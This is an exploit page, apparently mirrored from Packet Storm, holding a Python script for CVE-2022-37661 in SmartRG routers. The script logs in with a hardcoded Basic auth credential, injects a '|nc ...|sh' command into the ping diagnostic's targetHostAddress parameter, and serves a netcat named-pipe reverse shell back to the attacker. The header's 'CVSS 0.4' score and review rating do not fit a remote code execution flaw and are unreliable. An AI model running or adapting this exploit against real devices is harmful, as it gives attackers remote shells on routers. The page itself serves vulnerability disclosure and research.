Exploit for SmartRG Router 2.6.13 Remote Code Execution CVE-2022-37661

Name: Exploit for SmartRG Router 2.6.13 Remote Code Execution CVE-2022-37661
Rating: 5 (203 reviews)

2022-09-12 | CVSS 0.4

## https://sploitus.com/exploit?id=PACKETSTORM:168336
# Exploit Title: SmartRG Router - Remote Code Execution  
# Date: 13/06/2022  
# Exploit Author: Yerodin Richards  
# Vendor Homepage: https://adtran.com  
# Version: 2.5.15 / 2.6.13 (confirmed)  
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)  
# CVE : CVE-2022-37661  
  
import requests  
from subprocess import Popen, PIPE  
  
router_host = "http://192.168.1.1"  
authorization_header = "YWRtaW46QWRtMW5ATDFtMyM="  
  
lhost = "lo"  
lport = 80  
  
payload_port = 81  
  
  
def main():  
e_proc = Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tmp/s | nc {lhost} {lport} > /tmp/s"], stdout=PIPE)  
Popen(["nc", "-nlvp", f"{payload_port}"], stdin=e_proc.stdout)  
send_payload(f"|nc {lhost} {payload_port}|sh")  
print("done.. check shell")  
  
  
def get_session():  
url = router_host + "/admin/ping.html"  
headers = {"Authorization": "Basic {}".format(authorization_header)}  
r = requests.get(url, headers=headers).text  
i = r.find("&sessionKey=") + len("&sessionKey=")  
s = ""  
while r[i] != "'":  
s = s + r[i]  
i = i + 1  
return s  
  
  
def send_payload(payload):  
print(payload)  
url = router_host + "/admin/pingHost.cmd"  
headers = {"Authorization": "Basic {}".format(authorization_header)}  
params = {"action": "add", "targetHostAddress": payload, "sessionKey": get_session()}  
requests.get(url, headers=headers, params=params).text  
  
  
main()